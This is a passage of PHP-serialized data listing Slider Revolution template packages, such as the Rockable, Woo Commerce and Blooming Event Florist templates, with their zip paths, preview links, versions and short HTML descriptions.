Modal\";s:5:\"alias\";s:21:\"rockable-detail-modal\";s:3:\"zip\";s:31:\"packs/rockable-detail-modal.zip\";s:3:\"uid\";s:32:\"b51d918203ff7975a144a9f1be09f31b\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:405;a:25:{s:2:\"id\";s:3:\"441\";s:5:\"title\";s:23:\"Rockable Detail Modal 2\";s:5:\"alias\";s:23:\"rockable-detail-modal-2\";s:3:\"zip\";s:33:\"packs/rockable-detail-modal-2.zip\";s:3:\"uid\";s:32:\"dcf51ebb3d4a1dec94748a1e016c5ef7\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:406;a:22:{s:2:\"id\";s:3:\"442\";s:5:\"title\";s:27:\"Real Estate Showcase Slider\";s:5:\"alias\";s:27:\"real-estate-showcase-slider\";s:3:\"zip\";s:31:\"Real-Estate-Showcase-Slider.zip\";s:3:\"uid\";s:32:\"486b2bbe296722e70421731e3c05711b\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/real-estate-showcase-slider/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:152:\"<span class=\"ttm_content\">An elegant showcase for your real estate & realtor website. Flexible and customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:407;a:22:{s:2:\"id\";s:3:\"443\";s:5:\"title\";s:16:\"Isometric Slider\";s:5:\"alias\";s:16:\"isometric-slider\";s:3:\"zip\";s:20:\"isometric-slider.zip\";s:3:\"uid\";s:32:\"fb06051fcf6649a44f2292044e414a36\";s:3:\"img\";s:27:\"isometric-slider/slide1.jpg\";s:7:\"preview\";s:51:\"https://revolution.themepunch.com/isometric-slider/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:154:\"<span class=\"ttm_content\">A colorful, isometric slider template with fully customizable colors and screen content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:408;a:25:{s:2:\"id\";s:3:\"444\";s:5:\"title\";s:26:\"Woo Commerce Slider Static\";s:5:\"alias\";s:26:\"woo-commerce-slider-static\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"woo-commerce-slider-static\";s:3:\"img\";s:39:\"packages/woo-commerce-slider-static.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:178:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:7:\"website\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Woo Commerce Slider Static\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"35\";s:9:\"installed\";b:0;}i:409;a:25:{s:2:\"id\";s:3:\"445\";s:5:\"title\";s:17:\"E-Commerce Slider\";s:5:\"alias\";s:17:\"E-Commerce-Slider\";s:3:\"zip\";s:27:\"packs/E-Commerce-Slider.zip\";s:3:\"uid\";s:32:\"1533cfd83c2ae122f23074e1ed77f256\";s:3:\"img\";s:28:\"E-Commerce-Slider/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:178:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:4:\"hero\";i:1;s:7:\"website\";i:2;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Woo Commerce Slider Static\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"35\";s:9:\"installed\";b:0;}i:410;a:25:{s:2:\"id\";s:3:\"446\";s:5:\"title\";s:23:\"E-Commerce Slider Modal\";s:5:\"alias\";s:23:\"E-Commerce-Slider-Modal\";s:3:\"zip\";s:33:\"packs/E-Commerce-Slider-Modal.zip\";s:3:\"uid\";s:32:\"825e05c3967515b92a75da017c68a863\";s:3:\"img\";s:34:\"E-Commerce-Slider-Modal/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:178:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:4:\"hero\";i:1;s:7:\"website\";i:2;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Woo Commerce Slider Static\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"35\";s:9:\"installed\";b:0;}i:411;a:22:{s:2:\"id\";s:3:\"447\";s:5:\"title\";s:27:\"Woo Commerce Slider Dynamic\";s:5:\"alias\";s:27:\"Woo-Commerce-Slider-Dynamic\";s:3:\"zip\";s:31:\"Woo-Commerce-Slider-Dynamic.zip\";s:3:\"uid\";s:32:\"b8e2c64f3739e552c563c48c59f20fe7\";s:3:\"img\";s:38:\"Woo-Commerce-Slider-Dynamic/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/woo-commerce-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">A uniquely animated Woo Commerce Slider template - this is the dynamic version that uses Woo Commerce data</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:412;a:25:{s:2:\"id\";s:3:\"448\";s:5:\"title\";s:31:\"Blooming Event Florist Template\";s:5:\"alias\";s:31:\"blooming-event-florist-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:39:\"blooming-event-florist-template-package\";s:3:\"img\";s:52:\"packages/blooming-event-florist-template-package.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:413;a:26:{s:2:\"id\";s:3:\"449\";s:5:\"title\";s:15:\"Blooming Header\";s:5:\"alias\";s:15:\"blooming-header\";s:3:\"zip\";s:25:\"packs/blooming-header.zip\";s:3:\"uid\";s:32:\"aa2ee34fd8ed018945ba64e6913810e4\";s:3:\"img\";s:26:\"blooming-header/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:414;a:25:{s:2:\"id\";s:3:\"450\";s:5:\"title\";s:14:\"Blooming About\";s:5:\"alias\";s:14:\"blooming-about\";s:3:\"zip\";s:24:\"packs/blooming-about.zip\";s:3:\"uid\";s:32:\"dd7095e46fab2eb475d00480fd17a6ec\";s:3:\"img\";s:25:\"blooming-about/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:415;a:25:{s:2:\"id\";s:3:\"451\";s:5:\"title\";s:18:\"Blooming Portfolio\";s:5:\"alias\";s:18:\"blooming-portfolio\";s:3:\"zip\";s:28:\"packs/blooming-portfolio.zip\";s:3:\"uid\";s:32:\"c72ddcbb07b62982b8c21328a6383e22\";s:3:\"img\";s:29:\"blooming-portfolio/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:416;a:25:{s:2:\"id\";s:3:\"452\";s:5:\"title\";s:22:\"Blooming Wedding Title\";s:5:\"alias\";s:22:\"blooming-wedding-title\";s:3:\"zip\";s:32:\"packs/blooming-wedding-title.zip\";s:3:\"uid\";s:32:\"4fcfb0b99289c12d014c67306bb7687b\";s:3:\"img\";s:33:\"blooming-wedding-title/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:417;a:25:{s:2:\"id\";s:3:\"453\";s:5:\"title\";s:25:\"Blooming Wedding Carousel\";s:5:\"alias\";s:25:\"blooming-wedding-carousel\";s:3:\"zip\";s:35:\"packs/blooming-wedding-carousel.zip\";s:3:\"uid\";s:32:\"1d1bb979dbfca8ba9d43da1c0f665339\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:418;a:25:{s:2:\"id\";s:3:\"454\";s:5:\"title\";s:21:\"Blooming Wedding Text\";s:5:\"alias\";s:21:\"blooming-wedding-text\";s:3:\"zip\";s:31:\"packs/blooming-wedding-text.zip\";s:3:\"uid\";s:32:\"326f2793294a739dd3aac3cc45332df8\";s:3:\"img\";s:32:\"blooming-wedding-text/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:419;a:25:{s:2:\"id\";s:3:\"455\";s:5:\"title\";s:22:\"Blooming Parties Title\";s:5:\"alias\";s:22:\"blooming-parties-title\";s:3:\"zip\";s:32:\"packs/blooming-parties-title.zip\";s:3:\"uid\";s:32:\"b47aae1b368d3c3d9017f260e6c6a547\";s:3:\"img\";s:33:\"blooming-parties-title/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:420;a:25:{s:2:\"id\";s:3:\"456\";s:5:\"title\";s:25:\"Blooming Parties Carousel\";s:5:\"alias\";s:25:\"blooming-parties-carousel\";s:3:\"zip\";s:35:\"packs/blooming-parties-carousel.zip\";s:3:\"uid\";s:32:\"9f90a9da7b017aeee7f3b608cda066e6\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:421;a:25:{s:2:\"id\";s:3:\"457\";s:5:\"title\";s:21:\"Blooming Parties Text\";s:5:\"alias\";s:21:\"blooming-parties-text\";s:3:\"zip\";s:31:\"packs/blooming-parties-text.zip\";s:3:\"uid\";s:32:\"66a47346cc639b8b9b9b5dfa1521b6ef\";s:3:\"img\";s:32:\"blooming-parties-text/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:422;a:25:{s:2:\"id\";s:3:\"458\";s:5:\"title\";s:22:\"Blooming Funeral Title\";s:5:\"alias\";s:22:\"blooming-funeral-title\";s:3:\"zip\";s:32:\"packs/blooming-funeral-title.zip\";s:3:\"uid\";s:32:\"e9e77134472c33c56be442073f29d1fd\";s:3:\"img\";s:33:\"blooming-funeral-title/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:423;a:25:{s:2:\"id\";s:3:\"459\";s:5:\"title\";s:23:\"Blooming Funeral Slider\";s:5:\"alias\";s:23:\"blooming-funeral-slider\";s:3:\"zip\";s:33:\"packs/blooming-funeral-slider.zip\";s:3:\"uid\";s:32:\"d15090841c25c7c8f0e1b0987c0c0887\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/event-florist-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:31:\"Blooming Event Florist Template\";s:13:\"package_order\";s:2:\"11\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"36\";s:9:\"installed\";b:0;}i:424;a:25:{s:2:\"id\";s:3:\"460\";s:5:\"title\";s:21:\"Blooming Funeral 